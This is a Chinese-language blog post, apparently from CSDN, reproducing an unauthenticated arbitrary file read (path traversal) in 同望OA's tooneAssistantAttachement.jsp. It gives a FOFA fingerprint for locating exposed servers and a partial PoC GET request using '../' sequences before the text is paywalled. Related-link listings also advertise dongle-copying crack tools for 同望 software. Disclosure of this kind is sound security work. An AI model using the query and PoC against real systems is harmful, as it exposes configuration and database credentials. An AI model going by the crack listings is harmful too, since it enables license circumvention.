同望OA tooneAssistantAttachement.jsp 任意文件读取漏洞复现

已于 2024-10-10 16:12:10 修改
阅读量207 收藏
点赞数 12
分类专栏: 漏洞复现 文章标签: web安全 安全
于 2024-10-10 16:11:40 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_41904294/article/details/142824489
版权

0x01 产品简介

同望OA,即同望科技打造的智企云协同管理系统,是一款高效的企业协同移动办公系统。秉承“互联网++企业管理”理念,定位于以移动互联办公为基础的企业协同管理软件平台。它旨在通过内置常用标准模块与专项管理模块应用,安全快速地打通管理与业务通道,实现管理柔性和刚性的完美结合,助力企业实现协同价值最大化。

0x02 漏洞概述

同望OA tooneAssistantAttachement.jsp 接口存在任意文件读取漏洞,未经身份验证攻击者可通过该漏洞读取系统重要文件(如数据库配置文件、系统配置文件)、数据库配置文件等等,导致网站处于极度不安全状态。

0x03 复现环境

FOFA:

body="loginAction.struts?actionType=blockLogin"

0x04 漏洞复现

PoC

GET /jsp/oa/app/webservice/tooneAssistant/tooneAssistantAttachement.jsp?filename=./../../../../
了解本专栏 订阅专栏 解锁全文 超级会员免费看
0xSecl
关注
专栏目录
订阅专栏
mysql导入文件靠近 出错_同望 WECOST-FAQ问题汇总
weixin_36180068的博客
02-18 233
128、问:板式橡胶支座如何进行“个数”与“dm3”的工程量换算?答:(1)按结构型式分为:a.普通板式橡胶支座区分为矩形板式橡胶支座(代号GJZ)、圆形板式橡胶支座(代号GYZ);b.四氟滑板式橡胶支座区分为矩形四氟滑板橡胶支座(代号GJZF4)、圆形四氟滑板橡胶支座(代号GYZF4)。(2)按支座材料和适用温度分为:a.常温型橡胶支座,采用氯丁橡胶(CR)生产,适用的温度-25~60℃。b.耐...
如何读取、插入、更新xml文件
01-18 198
XML 指可扩展标记语言,XML 被设计用来传输和存储数据。现在做了个小项目,不想把数据存到数据库,直接保存到本地xml文件,这就需要对xml文件进行增删改查。以下就是思明新建的xml处理工具类XmlHelper using SelfSignalR2._0.Models; using System; using System.Collections.Generic; usi...
同望V3平台-修改密码
Heislikeadog的博客
11-01 510
同望V3平台-修改密码 登录时报将账号保存在窗体输出变量里面, 打开修改密码的窗体是,将窗体输出的变量赋值给修改密码窗体的输入变量。 这样我们就拿到账号的值了。 具体思路: 通过拿到账号值和获取旧密码的值使用函数GetTableData校验输入密码是否与旧密码一致 判断两次新密码输入是否一致 修改实体记录同步记录,将旧密码换成新密码 下面是添加的相关规则: ...
同望v平台如何设置自己想要的数据库
li291079091的博客
08-17 305
大家有没有为设置数据库感到困扰呢?不用烦恼,小V已经帮你准备好了一个小指南,本期V百科将教会大家如何设置自己想要的数据库!
同望第一天任务计划
weixin_30872671的博客
04-22 64
1.部署地址(新增 修改 删除 切换): 也可以在这里切换: 转载于:https://www.cnblogs.com/chen1005/p/10753538.html
echarts实现中国地图记录篇之2D,3D地图
weixin_42632751的博客
02-22 7967
本文主要讲述了echarts 2D(平面)、3D地图的实现方式,以及实现过程中遇到的各种坑。本文主要讲述并实现了 echarts2D平面有标记点中国地图、echarts无标记点中国地图;有贴图的3Decharts中国地图;有标记点的echarts 3D地图;提供了 3D地图如何添加点击事件,3D地图如何在点击的时候高亮某块,3D点击setOption()时贴图丢失等问题的解决方案。
小弟7月中旬即将去广东同望实习,有知道情况的大佬说下
JCracker
07-07 143
如题: 该公司来我校招聘 说的是要搞同望定制班,但是又通知7月中旬去公司实习。 由于我是重庆的,不了解珠海那边的状况。希望了解的大佬说说。 比如:实习是否提供住宿,实习补助是多少,车费是否报销等等。 更主要的是 他们面试没有问关于Java的专业知识。 都是一些数据结构之类的 去了会有交钱的培训么? 小弟在此,先谢过了...
Flac3d v3.00.251
weixin_33971977的博客
09-25 904
为什么80%的码农都做不了架构师?>>> ...
服务器虚拟机解锁苹果,Unlocker(VMware虚拟机MacOS系统解锁工具)v3.0.2 免费版-ucbug软件站...
weixin_33503186的博客
08-09 2401
VMware虚拟机MacOS系统解锁工具Unlocker是一款Unlocker解锁VMware Workstation虚拟机Mac系统工具,Unlocker可以解锁VMware Workstation,对苹果Mac系统的支持,使用该工具即可安装Mac系统的虚拟机、目前Unlocker工具的开发者已经发布Unlocker最新版以便支持新版VMware而且还支持Windows/Linux。使用说明1、...
同望8.3.01 S4写锁加升级
08-31
同望8.3.01 S4写锁加升级是一个针对同望软件版本进行的特定技术操作,旨在增强系统的安全性和稳定性。同望软件是一款广泛应用于项目管理、工程造价、招标投标等领域的专业软件,其8.3.01版在业内具有较高的知名度和...
同望造价9.7.3加密狗驱动.rar
07-18
当用户将加密狗插入计算机后,软件会读取其中的信息,验证用户是否有权运行同望造价9.7.3。这个过程就像一个电子钥匙,只有拥有正确“钥匙”的用户才能启动并正常使用软件。同望公路造价软件9.7.3定制锁yt88,表明这...
公路同望预算软件操作教程.doc
11-21
公路同望预算软件是一款专为公路工程造价管理设计的应用软件,它涵盖了从项目管理到费用计算的全过程。本文将详细讲解软件的操作流程。 1. 软件安装 公路同望预算软件的安装过程简单直观。打开安装程序,按照向导...
同望8.4.0.0深思S4无驱写锁写狗软件
01-05
同望8.4.0.0深思S4无驱写锁写狗软件详解》 在IT领域,尤其是在工程造价软件应用中,"同望造价"是一款广为使用的专业软件,它为用户提供精确的造价计算和管理功能。本文将详细解析标题提及的“同望8.4.0.0深思S4无...
同望8.4.1.0深思s4复制狗支持升级
06-20
同望8.4.1.0深思s4复制狗支持升级
2024年三个月网络安全(黑客技术)入门教程
2401_85027336的博客
09-25 2058
网络安全可以基于攻击和防御视角来分类,我们经常听到的 “红队”、“渗透测试” 等就是研究攻击技术,而“蓝队”、“安全运营”、“安全运维”则研究防御技术。走安全行业的工程方向的,技术上面其实有很大的重叠性,抛开甲乙方、岗位名称、岗位职责等因素来看,作为学技术的,也根据以往我们给学员推荐就业和入职情况来看,只要好好掌握以下几种技术(网络协议与安全设备、Linux操作系统、Web服务部署/开发、主流渗透测试/安全工具、一门及以上的编程语言)中的2到3个,都可以较好的胜任工作需求。
Web安全 - 路径穿越(Path Traversal)
小工匠
10-02 2541
路径穿越(Path Traversal)是一种Web应用漏洞,攻击者通过操控输入文件路径参数,以访问系统上未经授权的文件。通过路径穿越,攻击者可以使用诸如../的相对路径绕过访问限制,读取系统敏感信息或修改配置文件
网络安全(黑客)——自学2024
2401_84466325的博客
09-28 2970
网络安全是一种综合性的概念,涵盖了保护计算机系统、网络基础设施和数据免受未经授权的访问、攻击、损害或盗窃的一系列措施和技术。经常听到的 “红队”、“渗透测试” 等就是研究攻击技术,而“蓝队”、“安全运营”、“安全运维”则研究防御技术。作为一个合格的网络安全工程师,应该做到攻守兼备,毕竟知己知彼,才能百战百胜。
【网络安全】Cookie与ID未强绑定导致账户接管
最新发布
等风来
10-02 370
DigiLocker 是一项在线服务,旨在为公民提供一个安全的数字平台,用于存储和访问重要的文档,如 Aadhaar 卡、PAN 卡和成绩单等。DigiLocker 通过多因素身份验证(MFA)来保护用户账户安全,通常包括 6 位数的安全 PIN 和一次性密码(OTP)验证。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

0xSecl

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值